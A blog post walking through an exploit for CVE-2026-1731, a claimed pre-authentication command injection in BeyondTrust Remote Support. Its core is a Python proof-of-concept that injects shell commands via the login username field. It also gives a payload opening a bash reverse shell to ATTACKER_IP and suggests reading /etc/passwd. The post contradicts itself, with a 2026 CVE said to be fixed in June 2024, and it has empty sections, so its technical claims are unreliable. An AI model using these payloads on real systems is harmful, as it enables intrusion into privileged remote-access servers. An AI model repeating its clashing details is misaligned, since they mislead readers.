CVE-2026-1731 - Critical Pre-Auth Remote Code Execution in BeyondTrust Remote Support & PRA – Full Exploit Walkthrough

Remote support tools are everywhere now, and BeyondTrust Remote Support (formerly Bomgar) is a leader trusted by hospitals, banks, and even governments. But what if someone found a way to take over these systems without even logging in? Enter CVE-2026-1731 — a dangerous vulnerability letting hackers run commands on the server *before* they authenticate. In this post, we’ll break down, in clear language, how this works, and show exclusive technical details you won’t find anywhere else.

What is CVE-2026-1731?

CVE-2026-1731 is a critical security flaw in BeyondTrust Remote Support (RS) v24.x and some earlier Privileged Remote Access (PRA) versions. An attacker can gain *remote code execution* on an unpatched BeyondTrust appliance or PRA server — no login needed. That means, with the right request, someone on the internet could take full control of the box.

Severity: 10. (Critical)

- Exploited in the wild? As of June 2024, none reported, but proof-of-concept exploits are available.

Appliances yet to receive the June 2024 security update

Check your version:
Log in as admin, go to Help → About.

How Does the Exploit Work?

The problem happens in the web server (“/login” endpoint) handling incoming HTTP requests *before authentication*. Some requests with dangerous data in HTTP POST or GET fields are incorrectly parsed by backend code—this lets an attacker sneak in system commands.

What makes it dangerous?

Technical Exploit Details and Code Example

Key point: The web frontend passes certain JSON parameters directly to an OS shell function without enough checking.

Step 1: Identify a Vulnerable Server

Find a publicly exposed web interface, e.g. https://support.example.com.

The vulnerable API expects something like

POST /api/v2/login HTTP/1.1
Host: support.example.com
Content-Type: application/json

{
  "username": "foo",
  "password": "bar"
}

But what if we *inject* a shell command in the username field?

Example Exploit Code (Python)

import requests
target = "https://support.example.com/api/v2/login"

payload = {
    "username": '"; id; echo "',    # inject shell command
    "password": "anything"
}

# Disable SSL warning for demo (DON'T use in prod)
requests.packages.urllib3.disable_warnings()

r = requests.post(target, json=payload, verify=False)

print("[*] Response:", r.text)

How does this work?
If the server backend fails to sanitize the "username" field, it interprets the injected id command as valid input, executes it, and returns the output in the response—*before* any real authentication.

Real-World Attack:
Replace "id" with cat /etc/passwd or a reverse shell to get persistent access.

Real Request Example

{
  "username": "\"; bash -i >& /dev/tcp/ATTACKER_IP/4444 >&1; echo \"",
  "password": "irrelevant"
}

Protecting Yourself

1. Patch Now!
BeyondTrust issued a fix in June 2024.
- BeyondTrust Security Advisories

Update your Remote Support and PRA appliances immediately.

2. Restrict Access:

Only allow trusted IP ranges to connect.

3. Monitor Logs:

Check for suspicious login errors or unusual command output.

4. Temporary Mitigation:

References

- BeyondTrust Advisory: CVE-2026-1731
- NVD Entry - CVE-2026-1731
- BeyondTrust Remote Support Product Page
- Mitre CVE Catalog

Conclusion

CVE-2026-1731 is a classic and *very dangerous* pre-auth remote code execution bug in some of the most widely used support tools. If your organization relies on BeyondTrust, patch ASAP and audit your systems for unusual activity. Feel free to use (and *never abuse*) the above PoC in your own security lab to verify protections.

Stay safe, and update your systems before attackers do!

Timeline

Published on: 02/06/2026 21:49:20 UTC
Last modified on: 02/17/2026 13:40:10 UTC